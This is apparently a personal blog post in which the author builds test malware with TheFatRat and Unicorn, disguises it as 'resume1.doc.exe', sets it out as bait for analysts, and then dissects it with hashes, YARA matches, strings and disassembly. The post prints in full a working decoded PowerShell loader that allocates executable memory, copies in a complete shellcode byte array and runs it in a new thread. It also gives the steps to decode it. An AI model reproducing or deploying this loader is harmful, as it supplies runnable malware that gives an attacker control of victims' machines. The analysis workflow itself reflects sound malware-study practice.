I've been playing with some ideas recently, and it's actually kind of amusing what responses I can get and which sources I can identify them from. Let's start with one thing I generated with TheFatRat (basically a wrapper for building Metasploit-compatible shells). While testing its generation schemes I decided I would build some ways of doing this myself, such as adding a base64 exec to one page and a Unicorn PowerShell script to another, and using all of that. Anyway, let's look:
Edit: I wanted to add more, because the comparison between the IPs connecting to the C2 port for my test malware and the hosts connecting to my web server (not including Tor nodes) amuses me:
Both of these are things that have been scanned with VirusTotal or other platforms for shits and giggles, but it does make one thing clear: some analysts use Tor and some don't.
But what are people trying to analyze? Well, the miner one, with that particular notion at the end, was one provided in another post on this blog, plus my own GET data appended to it. This was specific to a URL submitted to VirusTotal, because I want to track who's tracking this. The diagfix one is unrelated: it's a Unicorn PowerShell payload regenerated every 300 seconds. I did this for ease of use and to test the "FUD" capabilities of TheFatRat. Honestly, it does a decent job of evading some shit, but anyone who looks at it for a split second would recognize it. YARA rules could easily identify it, or the exec form. You'll see that in my example above I left out the Meterpreter YARA rules; that's because, well, I wanted to do the analysis without the answer handed to me.
Things I learned with this week of dickery:
5 minute easy mode analysis:
; Hashes unknown
rahash2 -a all ./resume1.doc.exe
./resume1.doc.exe: 0x00000000-0x000041ff md5: 90f7ee1bf4451349dfa7c518a8c6202a
./resume1.doc.exe: 0x00000000-0x000041ff sha1: 0c214854fef6ac5c28f84bf07ee6d39eb3595d82
./resume1.doc.exe: 0x00000000-0x000041ff sha256: ea2bb0a47fedb86127a59e71285f61036e1ff9c4e0a1d0fae6fe8f2931e4d5a6
./resume1.doc.exe: 0x00000000-0x000041ff sha384: abfd2915e8b1bce3c871a8faec67b503599908c24ba08dfdcc8ca52c04560ec132328a31f53d4c8853ce12256488d0ad
./resume1.doc.exe: 0x00000000-0x000041ff sha512: fac47672393b774135997b98c86874667a526bc40c8ab04745d4c28de3b1afdea9f8efc257a9e8e4f42d3341f065a81bde0fe93a220a3adae338a1776bb5a691
./resume1.doc.exe: 0x00000000-0x000041ff crc16: 9f78
./resume1.doc.exe: 0x00000000-0x000041ff crc32: 1b63e4bd
./resume1.doc.exe: 0x00000000-0x000041ff md4: 282dcd274bd2efade3765ddff3ec65e1
./resume1.doc.exe: 0x00000000-0x000041ff xor: eb
./resume1.doc.exe: 0x00000000-0x000041ff xorpair: 3ad1
./resume1.doc.exe: 0x00000000-0x000041ff parity: 00
./resume1.doc.exe: 0x00000000-0x000041ff entropy: 03000000
./resume1.doc.exe: 0x00000000-0x000041ff hamdist: 01
./resume1.doc.exe: 0x00000000-0x000041ff pcprint: 2d
./resume1.doc.exe: 0x00000000-0x000041ff mod255: 4d
./resume1.doc.exe: 0x00000000-0x000041ff xxhash: 5924b386
./resume1.doc.exe: 0x00000000-0x000041ff adler32: 913ba49c
./resume1.doc.exe: 0x00000000-0x000041ff luhn: 00
./resume1.doc.exe: 0x00000000-0x000041ff crc8smbus: 3f
./resume1.doc.exe: 0x00000000-0x000041ff crc15can: 5a1d
./resume1.doc.exe: 0x00000000-0x000041ff crc16hdlc: 4045
./resume1.doc.exe: 0x00000000-0x000041ff crc16usb: a732
./resume1.doc.exe: 0x00000000-0x000041ff crc16citt: 4b6a
./resume1.doc.exe: 0x00000000-0x000041ff crc24: 7a1917
./resume1.doc.exe: 0x00000000-0x000041ff crc32c: d18b15a4
./resume1.doc.exe: 0x00000000-0x000041ff crc32ecma267: df97a7b0

; yara matches
find /yararules/ -type f -name "*.yar" -exec yara -r {} ./resume1.doc.exe \; 2>/dev/null
without_urls ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_yodas_Protector_v1033_dllocx__Ashkbiz_Danehkar_h_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_First_Publisher_Graphics_format_ ./resume1.doc.exe
_UPolyX_v05_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_NET_executable__Microsoft_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_Studio_NET_ ./resume1.doc.exe
_dUP_v2x_Patcher__wwwdiablo2oo2cjbnet_ ./resume1.doc.exe
_NET_executable_ ./resume1.doc.exe
_Microsoft_Visual_C_v70__Basic_NET_ ./resume1.doc.exe
_Microsoft_Visual_C__Basic_NET_ ./resume1.doc.exe
NETexecutableMicrosoft ./resume1.doc.exe
IsPE32 ./resume1.doc.exe
IsNET_EXE ./resume1.doc.exe
IsConsole ./resume1.doc.exe
Microsoft_Visual_Studio_NET ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_Basic_NET ./resume1.doc.exe
Microsoft_Visual_Studio_NET_additional ./resume1.doc.exe
Microsoft_Visual_C_v70_Basic_NET ./resume1.doc.exe
NET_executable_ ./resume1.doc.exe
NET_executable ./resume1.doc.exe
domain ./resume1.doc.exe
without_attachments ./resume1.doc.exe
without_urls ./resume1.doc.exe
without_images ./resume1.doc.exe
_Microsoft_Visual_Cpp_v70_DLL_ ./resume1.doc.exe
without_images ./resume1.doc.exe
IP ./resume1.doc.exe
without_attachments ./resume1.doc.exe
contentis_base64 ./resume1.doc.exe

; strings
rabin2 -zz resume1.doc.exe
Metadata Signature: 0x268 0x10001424a5342 12
.NET Version: v4.0.30319
Number of Metadata Streams: 5
DirectoryAddress: 6c Size: f0
Stream name: #~ 4
DirectoryAddress: 15c Size: b8
Stream name: #Strings 12
DirectoryAddress: 214 Size: 3688
Stream name: #US 4
DirectoryAddress: 389c Size: 10
Stream name: #GUID 8
DirectoryAddress: 38ac Size: 38
Stream name: #Blob 8
vaddr=0x0000004d paddr=0x0000004d ordinal=000 sz=45 len=44 section=unknown type=ascii string=!This program cannot be run in DOS mode.\r\r\n$
vaddr=0x000000a9 paddr=0x000000a9 ordinal=001 sz=24 len=5 section=unknown type=utf32le string=Y `䀀 blocks=Basic Latin,CJK Unified Ideographs Extension A
vaddr=0x00000178 paddr=0x00000178 ordinal=002 sz=6 len=5 section=unknown type=ascii string=.text
vaddr=0x0000019f paddr=0x0000019f ordinal=003 sz=7 len=6 section=unknown type=ascii string=`.rsrc
vaddr=0x000001c7 paddr=0x000001c7 ordinal=004 sz=8 len=7 section=unknown type=ascii string=@.reloc
vaddr=0x00402056 paddr=0x00000256 ordinal=005 sz=5 len=4 section=.text type=ascii string=\n*2r
vaddr=0x00402068 paddr=0x00000268 ordinal=006 sz=5 len=4 section=.text type=ascii string=BSJB
vaddr=0x00402078 paddr=0x00000278 ordinal=007 sz=11 len=10 section=.text type=ascii string=v4.0.30319
vaddr=0x00402088 paddr=0x00000288 ordinal=008 sz=24 len=5 section=.text type=utf32le string=lð縣Ŝ¸ blocks=Basic Latin,Latin-1 Supplement,CJK Unified Ideographs,Latin Extended-A
vaddr=0x004020a0 paddr=0x000002a0 ordinal=009 sz=5 len=4 section=.text type=ascii string=ings
vaddr=0x004020bc paddr=0x000002bc ordinal=010 sz=6 len=5 section=.text type=ascii string=#GUID
vaddr=0x004020cc paddr=0x000002cc ordinal=011 sz=6 len=5 section=.text type=ascii string=#Blob
vaddr=0x004021c5 paddr=0x000003c5 ordinal=012 sz=9 len=8 section=.text type=ascii string=<Module>
vaddr=0x004021ce paddr=0x000003ce ordinal=013 sz=7 len=6 section=.text type=ascii string=pshcmd
vaddr=0x004021d9 paddr=0x000003d9 ordinal=014 sz=7 len=6 section=.text type=ascii string=system
vaddr=0x004021e0 paddr=0x000003e0 ordinal=015 sz=11 len=10 section=.text type=ascii string=msvcrt.dll
vaddr=0x004021ef paddr=0x000003ef ordinal=016 sz=7 len=6 section=.text type=ascii string=Object
vaddr=0x004021f6 paddr=0x000003f6 ordinal=017 sz=7 len=6 section=.text type=ascii string=System
vaddr=0x004021fd paddr=0x000003fd ordinal=018 sz=6 len=5 section=.text type=ascii string=.ctor
vaddr=0x00402203 paddr=0x00000403 ordinal=019 sz=5 len=4 section=.text type=ascii string=Main
vaddr=0x00402208 paddr=0x00000408 ordinal=020 sz=20 len=19 section=.text type=ascii string=csharpandpowershell
vaddr=0x0040221c paddr=0x0000041c ordinal=021 sz=30 len=29 section=.text type=ascii string=RuntimeCompatibilityAttribute
vaddr=0x0040223a paddr=0x0000043a ordinal=022 sz=32 len=31 section=.text type=ascii string=System.Runtime.CompilerServices
vaddr=0x0040225a paddr=0x0000045a ordinal=023 sz=9 len=8 section=.text type=ascii string=mscorlib
vaddr=0x00402263 paddr=0x00000463 ordinal=024 sz=24 len=23 section=.text type=ascii string=csharpandpowershell.exe
vaddr=0x0040227f paddr=0x0000047f ordinal=025 sz=4090 len=2045 section=.text type=utf16le string=powershell -window hidden -EncodedCommand JAB...AB
vaddr=0x00403279 paddr=0x00001479 ordinal=026 sz=4090 len=2045 section=.text type=utf16le string=4A...MA
vaddr=0x00404273 paddr=0x00002473 ordinal=027 sz=4090 len=2045 section=.text type=utf16le string=Yw...B9A
vaddr=0x0040526d paddr=0x0000346d ordinal=028 sz=1698 len=848 section=.text type=utf16le string=Ds...==였꽆쑜镨멁 blocks=Basic Latin,Hangul Syllables,CJK Unified Ideographs
vaddr=0x0040590f paddr=0x00003b0f ordinal=029 sz=6 len=5 section=.text type=ascii string=n'W]7
vaddr=0x0040592a paddr=0x00003b2a ordinal=030 sz=23 len=22 section=.text type=ascii string=WrapNonExceptionThrows
vaddr=0x00405982 paddr=0x00003b82 ordinal=031 sz=12 len=11 section=.text type=ascii string=_CorExeMain
vaddr=0x0040598e paddr=0x00003b8e ordinal=032 sz=12 len=11 section=.text type=ascii string=mscoree.dll
vaddr=0x00406062 paddr=0x00003c62 ordinal=033 sz=28 len=13 section=.rsrc type=utf16le string=_VERSION_INFO
vaddr=0x004060bc paddr=0x00003cbc ordinal=034 sz=22 len=10 section=.rsrc type=utf16le string=arFileInfo
vaddr=0x004060da paddr=0x00003cda ordinal=035 sz=24 len=11 section=.rsrc type=utf16le string=Translation
vaddr=0x004060fe paddr=0x00003cfe ordinal=036 sz=30 len=14 section=.rsrc type=utf16le string=StringFileInfo
vaddr=0x00406122 paddr=0x00003d22 ordinal=037 sz=18 len=8 section=.rsrc type=utf16le string=007f04b0
vaddr=0x0040613a paddr=0x00003d3a ordinal=038 sz=18 len=8 section=.rsrc type=utf16le string=Comments
vaddr=0x00406158 paddr=0x00003d58 ordinal=039 sz=22 len=10 section=.rsrc type=utf16le string=ompanyName
vaddr=0x0040617c paddr=0x00003d7c ordinal=040 sz=30 len=14 section=.rsrc type=utf16le string=ileDescription
vaddr=0x004061a6 paddr=0x00003da6 ordinal=041 sz=24 len=11 section=.rsrc type=utf16le string=FileVersion
vaddr=0x004061c0 paddr=0x00003dc0 ordinal=042 sz=16 len=7 section=.rsrc type=utf16le string=0.0.0.0
vaddr=0x004061d6 paddr=0x00003dd6 ordinal=043 sz=26 len=12 section=.rsrc type=utf16le string=InternalName
vaddr=0x004061f0 paddr=0x00003df0 ordinal=044 sz=40 len=19 section=.rsrc type=utf16le string=csharpandpowershell
vaddr=0x0040621e paddr=0x00003e1e ordinal=045 sz=30 len=14 section=.rsrc type=utf16le string=LegalCopyright
vaddr=0x00406248 paddr=0x00003e48 ordinal=046 sz=30 len=14 section=.rsrc type=utf16le string=egalTrademarks
vaddr=0x00406272 paddr=0x00003e72 ordinal=047 sz=34 len=16 section=.rsrc type=utf16le string=OriginalFilename
vaddr=0x00406294 paddr=0x00003e94 ordinal=048 sz=48 len=23 section=.rsrc type=utf16le string=csharpandpowershell.exe
vaddr=0x004062ca paddr=0x00003eca ordinal=049 sz=24 len=11 section=.rsrc type=utf16le string=ProductName
vaddr=0x004062f0 paddr=0x00003ef0 ordinal=050 sz=28 len=13 section=.rsrc type=utf16le string=roductVersion

; note
payload appears to be powershell payload with base64; not valid length by itself
JAB...AMAB

; collecting base64 strings together
JAB...==

; writing decoded base64 to file
open('resumebase64.decoded','wb').write("""JAB...==""".decode('base64'))

; strings from decoded base64
rabin2 -zz resumebase64.decoded
vaddr=0x00000000 paddr=0x00000000 ordinal=000 sz=4090 len=2045 section=unknown type=utf16le string=$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,
vaddr=0x00000ffa paddr=0x00000ffa ordinal=001 sz=1110 len=555 section=unknown type=utf16le string=0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$0dX3,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));$iS0 = "-enc ";if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; Investigating powershell
$E2yZ = '$BVJ = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';
$w = Add-Type -memberDefinition $BVJ -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$z = 0xd9,0xe9,0xba,0x34,0x68,0x34,0x36,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,0x47,0x31,0x56,0x18,0x83,0xc6,0x04,0x03,0x56,0x20,0x8a,0xc1,0xca,0xa0,0xc8,0x2a,0x33,0x30,0xad,0xa3,0xd6,0x01,0xed,0xd0,0x93,0x31,0xdd,0x93,0xf6,0xbd,0x96,0xf6,0xe2,0x36,0xda,0xde,0x05,0xff,0x51,0x39,0x2b,0x00,0xc9,0x79,0x2a,0x82,0x10,0xae,0x8c,0xbb,0xda,0xa3,0xcd,0xfc,0x07,0x49,0x9f,0x55,0x43,0xfc,0x30,0xd2,0x19,0x3d,0xba,0xa8,0x8c,0x45,0x5f,0x78,0xae,0x64,0xce,0xf3,0xe9,0xa6,0xf0,0xd0,0x81,0xee,0xea,0x35,0xaf,0xb9,0x81,0x8d,0x5b,0x38,0x40,0xdc,0xa4,0x97,0xad,0xd1,0x56,0xe9,0xea,0xd5,0x88,0x9c,0x02,0x26,0x34,0xa7,0xd0,0x55,0xe2,0x22,0xc3,0xfd,0x61,0x94,0x2f,0xfc,0xa6,0x43,0xbb,0xf2,0x03,0x07,0xe3,0x16,0x95,0xc4,0x9f,0x22,0x1e,0xeb,0x4f,0xa3,0x64,0xc8,0x4b,0xe8,0x3f,0x71,0xcd,0x54,0x91,0x8e,0x0d,0x37,0x4e,0x2b,0x45,0xd5,0x9b,0x46,0x04,0xb1,0x68,0x6b,0xb7,0x41,0xe7,0xfc,0xc4,0x73,0xa8,0x56,0x43,0x3f,0x21,0x71,0x94,0x40,0x18,0xc5,0x0a,0xbf,0xa3,0x36,0x02,0x7b,0xf7,0x66,0x3c,0xaa,0x78,0xed,0xbc,0x53,0xad,0x98,0xb6,0xc3,0x96,0x6a,0x77,0x71,0x4f,0x97,0x77,0x56,0xbf,0x1e,0x91,0xc8,0xef,0x70,0x0e,0xa8,0x5f,0x31,0xfe,0x40,0x8a,0xbe,0x21,0x70,0xb5,0x14,0x4a,0x1a,0x5a,0xc1,0x22,0xb2,0xc3,0x48,0xb8,0x23,0x0b,0x47,0xc4,0x63,0x87,0x64,0x38,0x2d,0x60,0x00,0x2a,0xd9,0x80,0x5f,0x10,0x4f,0x9e,0x75,0x3f,0x6f,0x0a,0x72,0x96,0x38,0xa2,0x78,0xcf,0x0e,0x6d,0x82,0x3a,0x05,0xa4,0x16,0x85,0x71,0xc9,0xf6,0x05,0x81,0x9f,0x9c,0x05,0xe9,0x47,0xc5,0x55,0x0c,0x88,0xd0,0xc9,0x9d,0x1d,0xdb,0xbb,0x72,0xb5,0xb3,0x41,0xad,0xf1,0x1b,0xb9,0x98,0x03,0x67,0x6c,0xe4,0x71,0x89,0xac;
$g = 0x1000;
if ($z.Length -gt 0x1000){$g = $z.Length};
$0dX3=$w::VirtualAlloc(0,0x1000,$g,0x40);
for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($0dX3.ToInt32()+$i), $z[$i], 1)};
$w::CreateThread(0,0,$0dX3,0,0,0);
for (;;){Start-sleep 60};';
$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($E2yZ));
$iS0 = "-enc ";
if([IntPtr]::Size -eq 8){$BzQ = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $BzQ $iS0 $e"}else{;iex "& powershell $iS0 $e";}

; saving hex as binary file
open('resumehex.bin','wb').write("0xd9,...0xac".replace(',','').replace('0x','').replace(' ','').decode('hex'))

; radare from bin
[0x00000000]> pD
0x00000000 d9e9 fldl2t
0x00000002 ba34683436 mov edx, 0x36346834
0x00000007 d97424f4 fnstenv dword [rsp - 0xc]
0x0000000b 5e pop rsi
0x0000000c 33c9 xor ecx, ecx
0x0000000e b147 mov cl, 0x47 ; 'G'
0x00000010 315618 xor dword [rsi + 0x18], edx
0x00000013 83c604 add esi, 4
0x00000016 035620 add edx, dword [rsi + 0x20]
0x00000019 8ac1 mov al, cl
0x0000001b caa0c8 retf -0x3760
0x0000001e 2a33 sub dh, byte [rbx]
0x00000020 30ada3d601ed xor byte [rbp - 0x12fe295d], ch
0x00000026 d09331dd93f6 rcl byte [rbx - 0x96c22cf], 1
0x0000002c bd96f6e236 mov ebp, 0x36e2f696
0x00000031 dade fcmovu st(0), st(6)
0x00000033 05ff51392b add eax, 0x2b3951ff
0x00000038 00c9 add cl, cl
0x0000003a 792a jns 0x66
0x0000003c 82 invalid
0x0000003d 10ae8cbbdaa3 adc byte [rsi - 0x5c254474], ch
0x00000043 cdfc int 0xfc
0x00000045 07 invalid
0x00000046 499f lahf
0x00000048 55 push rbp
0x00000049 43fc cld
0x0000004b 30d2 xor dl, dl
0x0000004d 193dbaa88c45 sbb dword [0x458ca90d], edi
0x00000053 5f pop rdi
0x00000054 78ae js 4
0x00000056 64 invalid
0x00000057 ce invalid
0x00000058 f3e9a6f0d081 jmp 0xffffffff81d0f104
0x0000005e ee out dx, al
0x0000005f ea invalid
0x00000060 35afb9818d xor eax, 0x8d81b9af
0x00000065 5b pop rbx
0x00000066 3840dc cmp byte [rax - 0x24], al ; [0x2:1]=186
0x00000069 a4 movsb byte [rdi], byte ptr [rsi]
0x0000006a 97 xchg eax, edi
0x0000006b ad lodsd eax, dword [rsi]
0x0000006c d156e9 rcl dword [rsi - 0x17], 1
0x0000006f ea invalid
0x00000070 d5 invalid
0x00000071 889c022634a7. mov byte [rdx + rax - 0x2f58cbda], bl
0x00000078 55 push rbp
0x00000079 e222 loop 0x9d
0x0000007b c3 ret
0x0000007c fd std
0x0000007d 61 invalid
0x0000007e 94 xchg eax, esp
0x0000007f 2f invalid
0x00000080 fc cld
0x00000081 a6 cmpsb byte [rsi], byte ptr [rdi] ; [0x2700000000:1]=255 ; 167503724544
0x00000082 43bbf20307e3 mov r11d, 0xe30703f2
0x00000088 16 invalid ; 0xe30703f2
0x00000089 95 xchg eax, ebp
0x0000008a c4 invalid
0x0000008b 9f lahf
0x0000008c 221e and bl, byte [rsi]
0x0000008e eb4f jmp 0xdf
0x00000090 a364c84be83f. movabs dword [0x54cd713fe84bc864], eax ; [0x54cd713fe84bc864:4]=-1
0x00000099 91 xchg eax, ecx
0x0000009a 8e0d374e2b45 mov cs, word [0x452b4ed7] ; [0x452b4ed7:2]=0xffff
0x000000a0 d5 invalid ; [0x452b4ed7:2]=0xffff
0x000000a1 9b wait
0x000000a2 4604b1 add al, 0xb1
0x000000a5 686bb741e7 push -0x18be4895
0x000000aa fc cld
0x000000ab c4 invalid
0x000000ac 73a8 jae 0x56
0x000000ae 56 push rsi
0x000000af 43 invalid
0x000000b0 3f invalid
0x000000b1 217194 and dword [rcx - 0x6c], esi
0x000000b4 4018c5 sbb bpl, al
0x000000b7 0abfa336027b or bh, byte [rdi + 0x7b0236a3]
0x000000bd f7663c mul dword [rsi + 0x3c]
0x000000c0 aa stosb byte [rdi], al
0x000000c1 78ed js 0xb0
0x000000c3 bc53ad98b6 mov esp, 0xb698ad53
0x000000c8 c3 ret
0x000000c9 96 xchg eax, esi
0x000000ca 6a77 push 0x77 ; 'w'
0x000000cc 714f jno 0x11d
0x000000ce 97 xchg eax, edi
0x000000cf 7756 ja 0x127
0x000000d1 bf1e91c8ef mov edi, 0xefc8911e
0x000000d6 700e jo 0xe6
0x000000d8 a85f test al, 0x5f ; '_'
0x000000da 31fe xor esi, edi
0x000000dc 408abe2170b5. mov dil, byte [rsi + 0x14b57021] ; [0x14b57021:1]=255
0x000000e3 4a1a5ac1 sbb bl, byte [rdx - 0x3f]
0x000000e7 22b2c348b823 and dh, byte [rdx + 0x23b848c3]
0x000000ed 0b47c4 or eax, dword [rdi - 0x3c]
0x000000f0 63 invalid
0x000000f1 8764382d xchg dword [rax + rdi + 0x2d], esp
0x000000f5 60 invalid
0x000000f6 002a add byte [rdx], ch
0x000000f8 d9805f104f9e fld dword [rax - 0x61b0efa1]
0x000000fe 753f jne 0x13f

; changed to 32 bit
radare2 -b 32 resumehex.bin
[0x00000000]> pD
0x00000000 d9e9 fldl2t
0x00000002 ba34683436 mov edx, 0x36346834
0x00000007 d97424f4 fnstenv dword [esp - 0xc]
0x0000000b 5e pop esi
0x0000000c 33c9 xor ecx, ecx
0x0000000e b147 mov cl, 0x47 ; 'G'
0x00000010 315618 xor dword [esi + 0x18], edx
0x00000013 83c604 add esi, 4
0x00000016 035620 add edx, dword [esi + 0x20]
0x00000019 8ac1 mov al, cl
0x0000001b caa0c8 retf -0x3760
0x0000001e 2a33 sub dh, byte [ebx]
0x00000020 30ada3d601ed xor byte [ebp - 0x12fe295d], ch
0x00000026 d09331dd93f6 rcl byte [ebx - 0x96c22cf], 1
0x0000002c bd96f6e236 mov ebp, 0x36e2f696
0x00000031 dade fcmovu st(0), st(6)
0x00000033 05ff51392b add eax, 0x2b3951ff
0x00000038 00c9 add cl, cl
0x0000003a 792a jns 0x66
0x0000003c 82 invalid
0x0000003d 10ae8cbbdaa3 adc byte [esi - 0x5c254474], ch
0x00000043 cdfc int 0xfc
0x00000045 07 pop es
0x00000046 49 dec ecx
0x00000047 9f lahf
0x00000048 55 push ebp
0x00000049 43 inc ebx
0x0000004a fc cld
0x0000004b 30d2 xor dl, dl
0x0000004d 193dbaa88c45 sbb dword [0x458ca8ba], edi
0x00000053 5f pop edi
0x00000054 78ae js 4
0x00000056 64ce into
0x00000058 f3e9a6f0d081 jmp 0x81d0f104
0x0000005e ee out dx, al
0x0000005f ea35afb9818d. ljmp 0x5b8d:0x81b9af35
0x00000066 3840dc cmp byte [eax - 0x24], al ; [0x2:1]=186
0x00000069 a4 movsb byte es:[edi], byte ptr [esi]
0x0000006a 97 xchg eax, edi
0x0000006b ad lodsd eax, dword [esi]
0x0000006c d156e9 rcl dword [esi - 0x17], 1
0x0000006f ead5889c0226. ljmp 0x3426:0x29c88d5
0x00000076 a7 cmpsd dword [esi], dword ptr es:[edi] ; [0x170000001c:4]=-1 ; 98784247836
0x00000077 d055e2 rcl byte [ebp - 0x1e], 1
0x0000007a 22c3 and al, bl
0x0000007c fd std
0x0000007d 61 popal
0x0000007e 94 xchg eax, esp
0x0000007f 2f das
0x00000080 fc cld
0x00000081 a6 cmpsb byte [esi], byte ptr es:[edi] ; [0x170000001c:1]=255 ; 98784247836
0x00000082 43 inc ebx
0x00000083 bbf20307e3 mov ebx, 0xe30703f2
0x00000088 16 push ss
0x00000089 95 xchg eax, ebp
0x0000008a c49f221eeb4f les ebx, [edi + 0x4feb1e22]
0x00000090 a364c84be8 mov dword [0xe84bc864], eax ; [0xe84bc864:4]=-1
0x00000095 3f aas
0x00000096 71cd jno 0x65
0x00000098 54 push esp
0x00000099 91 xchg eax, ecx
0x0000009a 8e0d374e2b45 mov cs, word [0x452b4e37] ; [0x452b4e37:2]=0xffff
0x000000a0 d59b aad 0x9b
0x000000a2 46 inc esi
0x000000a3 04b1 add al, 0xb1
0x000000a5 686bb741e7 push 0xe741b76b
0x000000aa fc cld
0x000000ab c473a8 les esi, [ebx - 0x58]
0x000000ae 56 push esi
0x000000af 43 inc ebx
0x000000b0 3f aas
0x000000b1 217194 and dword [ecx - 0x6c], esi
0x000000b4 40 inc eax
0x000000b5 18c5 sbb ch, al
0x000000b7 0abfa336027b or bh, byte [edi + 0x7b0236a3]
0x000000bd f7663c mul dword [esi + 0x3c]
0x000000c0 aa stosb byte es:[edi], al
0x000000c1 78ed js 0xb0
0x000000c3 bc53ad98b6 mov esp, 0xb698ad53
0x000000c8 c3 ret
0x000000c9 96 xchg eax, esi
0x000000ca 6a77 push 0x77 ; 'w' ; 119
0x000000cc 714f jno 0x11d
0x000000ce 97 xchg eax, edi
0x000000cf 7756 ja 0x127
0x000000d1 bf1e91c8ef mov edi, 0xefc8911e
0x000000d6 700e jo 0xe6
0x000000d8 a85f test al, 0x5f ; '_'
0x000000da 31fe xor esi, edi
0x000000dc 40 inc eax
0x000000dd 8abe2170b514 mov bh, byte [esi + 0x14b57021] ; [0x14b57021:1]=255
0x000000e3 4a dec edx
0x000000e4 1a5ac1 sbb bl, byte [edx - 0x3f]
0x000000e7 22b2c348b823 and dh, byte [edx + 0x23b848c3]
0x000000ed 0b47c4 or eax, dword [edi - 0x3c]
0x000000f0 638764382d60 arpl word [edi + 0x602d3864], ax
0x000000f6 002a add byte [edx], ch
0x000000f8 d9805f104f9e fld dword [eax - 0x61b0efa1]
0x000000fe 753f jne 0x13f

; because lazy and time
https://app.any.run/tasks/995eb5e3-4c5f-4c47-b849-67ff647c6387

; Connection data
(myserver):9008 -> exe came across
dumped entire pcap from c2 into file:
- file resumepcap.hexdump
-- resumepcap.hexdump: data
